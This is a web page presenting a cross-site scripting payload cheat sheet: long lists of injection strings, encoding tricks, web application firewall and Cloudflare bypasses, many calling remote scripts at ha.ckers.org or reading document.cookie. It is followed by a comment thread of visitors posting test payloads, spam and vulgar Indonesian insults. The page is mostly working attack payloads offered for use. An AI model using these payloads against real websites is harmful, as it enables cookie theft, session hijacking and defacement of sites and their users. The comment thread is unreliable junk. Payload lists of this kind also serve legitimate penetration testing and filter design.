Cross-site Scripting Payloads Cheat Sheet – Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
Basic Payload
<script>alert(123)</script> <img src="javascript:alert('XSS');"> <script>alert("XSS");</script> javascript:alert("XSS")
Another Payload
<img src=javascript:alert("XSS")> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search <script>alert("XSS")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 <script>alert("XSS");</script>&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search <h1><font color=blue>hellox worldss</h1>
<BODY ONLOAD=alert('hellox worldss')> <input onfocus=write(XSS) autofocus> <input onblur=write(XSS) autofocus><input autofocus> <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form><button formaction="javascript:alert(XSS)">lol <!--<img src="--><img src=x onerror=alert(XSS)//"> <![><img src="]><img src=x onerror=alert(XSS)//"> <style><img src="</style><img src=x onerror=alert(XSS)//">
<? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>"> <? foo="><x foo='?><script>alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> <% foo><x foo="%><script>alert(123)</script>"> <div style="font-family:'foo ;color:red;';">LOL
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> <script>({0:#0=alert/#0#/#0#(0)})</script> <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> <SCRIPT>alert(/XSS/.source)</SCRIPT> \\";alert('XSS');// </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT> <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"> <BODY BACKGROUND=\"javascript:alert('XSS')\"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC=\"javascript:alert('XSS')\"> <IMG LOWSRC=\"javascript:alert('XSS')\"> <BGSOUND SRC=\"javascript:alert('XSS');\"> <BR SIZE=\"&{alert('XSS')}\"> <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER> <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"> <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\"> <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE> <XSS STYLE=\"behavior: url(xss.htc);\"> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox(\"XSS\")'> <IMG SRC=\"mocha:[code]\"> <IMG SRC=\"livescript:[code]\"> scriptualert(EXSSE)/scriptu <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\" <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME> <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <TABLE BACKGROUND=\"javascript:alert('XSS')\"> <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\"> <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\"> <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\"> <DIV STYLE=\"width: expression(alert('XSS'));\"> <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE> <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"> <XSS STYLE=\"xss:expression(alert('XSS'))\"> exp/*<A STYLE='no\xss:noxss(\"*//*\"); xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'> <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A> <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <BASE HREF=\"javascript:alert('XSS');//\"> <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED> <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED> a=\"get\"; b=\"URL(\\"\"; c=\"javascript:\"; d=\"alert('XSS');\\")\"; eval(a+b+c+d); <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML> <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN> <XML SRC=\"xsstest.xml\" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"> <?import namespace=\"t\" implementation=\"#default#time2\"> <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\"> </BODY></HTML> <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT> <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"--> <? echo('<SCR)'; echo('IPT>alert(\"XSS\")</SCRIPT>'); ?> <IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\"> <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <A HREF=\"http://66.102.7.147/\">XSS</A> <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A> <A HREF=\"http://1113982867/\">XSS</A> <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A> <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A> <A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A> <A HREF=\"//www.google.com/\">XSS</A> <A HREF=\"//google\">XSS</A> <A HREF=\"http://ha.ckers.org@google\">XSS</A> <A HREF=\"http://google:ha.ckers.org\">XSS</A> <A HREF=\"http://google.com/\">XSS</A> <A HREF=\"http://www.google.com./\">XSS</A> <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A> <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A> <iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC=\"javascript:alert('XSS')\" <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert(\"XSS\");//<</SCRIPT> <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")> <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> <IMG SRC=\" javascript:alert('XSS');\"> perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out <IMG SRC=\"jav
ascript:alert('XSS');\"> <IMG SRC=\"jav
ascript:alert('XSS');\"> <IMG SRC=\"jav	ascript:alert('XSS');\"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"> <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=\"javascript:alert('XSS');\"> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> '';!--\"<XSS>=&{()} ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC=javascript:alert('XSS')> <IMG SRC=javascrscriptipt:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> ŒscriptŸalert(¢XSS¢)Œ/scriptŸ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION <form><button formaction="javascript:alert(123)">crosssitespt <frameset onload=alert(123)> <!--<img src="--><img src=x onerror=alert(123)//"> <style><img src="</style><img src=x onerror=alert(123)//"> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> <embed src="javascript:alert(1)">
<? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>">
<script>({0:#0=alert/#0#/#0#(123)})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script> <script src="#">{alert(1)}</script>;1 <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script> <svg xmlns="#"><script>alert(1)</script></svg> <svg onload="javascript:alert(123)" xmlns="#"></svg> <iframe xmlns="#" src="javascript:alert(1)"></iframe> +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e ><s%2bcript>alert(document.cookie)</script> ><ScRiPt>alert(document.cookie)</script> ><<script>alert(document.cookie);//<</script> foo%00<script>alert(document.cookie)</script> <scr<script>ipt>alert(document.cookie)</scr</script>ipt> %22/%3E%3CBODY%20onload=document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)%3E ; alert(document.cookie); var foo= foo\; alert(document.cookie);//; </script><script >alert(document.cookie)</script> <img src=asdf onerror=alert(document.cookie)> <BODY ONLOAD=alert(XSS)> "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> <video src=1 onerror=alert(1)> <audio src=1 onerror=alert(1)>
Double quoted
`"autofocus onfocus="alert(1)` `"autofocus onfocus=alert(1)//` `"onbeforescriptexecute=alert(1)//` `"onmouseover="alert(1)//` (Interaction) `"autofocus onblur="alert(1)` (Interaction)
Single Quoted
`'autofocus onfocus='alert(1)` `'autofocus onfocus=alert(1)//` `'onbeforescriptexecute=alert(1)//` `'onmouseover='alert(1)//` (Interaction) `'autofocus onblur='alert(1)` (Interaction)
Without Quotations
`aaaa autofocus onfocus=alert(1)//` `aaaa onbeforescriptexecute=alert(1)//` `aaaa onmouseover=alert(1)//`
Bypass Firewall
"><input/onauxclick="[1].map(prompt)"> <img src=x onerror=eval(atob('YWxlcnQoJ0kgb25seSB3cml0ZSBsYW1lIFBvQ3MnKQ==')) /> '"--><Body onbeforescriptexecute="[1].map(confirm)"> '-prompt.call(window, 'xss')-' '-alert.call(window, 'xss')-' <\/script><script>alert('XSS')<\/script> aaa"bbb'ccc<svg onload=alert('XSS')>eee javascript://%0a%0dalert(document.cookie) <--`<img/src=`%20onerror=confirm``>%20--!> <svg </onload ="1> (_=alert,_(1337)) ""> <details/open/ontoggle=window.alert`xss`>
Cloudflare Bypass
Cloudflare XSS Bypasses by @Bohdan Korzhynskyi – 3rd june 2019
<svg onload=prompt%26%230000000040document.domain)> <svg onload=prompt%26%23x000000028;document.domain)> xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
Cloudflare XSS Bypass – 22nd march 2019 (by @RakeshMane10)
<svg/onload=alert()//
Another payload
- https://github.com/ismailtasdelen/xss-payload-list
- https://github.com/s0md3v/AwesomeXSS
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
Different case need different payload.
NYAN says
KONTOL
ndoweh says
Taek hp anak kecil diarahkan ke bokep, nah giliran gua malah gk diarahkan,,,,,
Blok tai
Mm says
Mm says
hallo
mm says
alert(“hellox worldss”);</script
mm says
rizky07
Mm says
hallo
Mm says
vulln xss
Mm says
#
Mm says
xss by rizky07Mm says
HH
Mm says
xss by rizky07
Mm says
xss by rizky07
Mm says
xss by rizky07ganteng says
ah masa
babiaer says
alert (“ngentot”)
noname says
“>test
test says
test
test says
test
' says
‘
ysyssy says
testyesye
tst says
“onclick=prompt`1`>
"/onmouseover="alert(1) says
“/onmouseover=”alert(1)
">test says
“>test
sjssjjswoyjssjsj says
sjssjjswoyjssjsj
dhdj says
\\";alert('XSS');// says
\\”;alert(‘XSS’);//
\\";alert('XSS');// says
\\”;alert(‘XSS’);//
test says
a=\”get\”;
b=\”URL(\\”\”;
c=\”javascript:\”;
d=\”alert(‘XSS’);\\”)\”;
eval(a+b+c+d);
xjjxjx says
“>test
serizawa says
alert(“SAGIRI LONTE”)
">asdasd says
“>asdasd
Mbet says
Bebas says
‘svg onload=”prompt(document.URL)”>
admin says
<alert(“XSS”);//<
“>’>alert(String.fromCharCode(88,83,83))
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search
alert(“XSS”)&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
alert(“XSS”);&search=1
0&q=’;alert(String.fromCharCode(88,83,83))//\’;alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29//–>”>’>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search
hellox worldss
Anonymous says
Anonymous says
How
./Loli Hunter says
Hallo
./Loli Hunter says
b says
<script>alert("Halo")</script>
a says
alert(“Halo”)
Test says
CLICK
Test says
CLICK
Twts says
“>CLICK
Twtwt says
<p title="”>
Twtatq says
CLICK
awaawa says
aw
./randiXploit says
“>’>alert(String.fromCharCode(88,83,83))
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )// says
jaVasCript:/*-/*`/*\`/*’/*”/*%0D%0A%0d%0a*/(/* */oNcliCk=alert() )//</stYle/</titLe/</teXtarEa/\x3ciframe/\x3e
"> says
“>
Raqyat says
KOMENAN TOLOL ANJ
"onlick=alert('/hamdan/') // says
“>${{7*7}}
wkwkw says
wek
min says
min
ok says
ok
Test says
for real
%3ca%3efor real too%3c%2fa%3e
Test says
Test says
Outside p tag
Test says
asdasd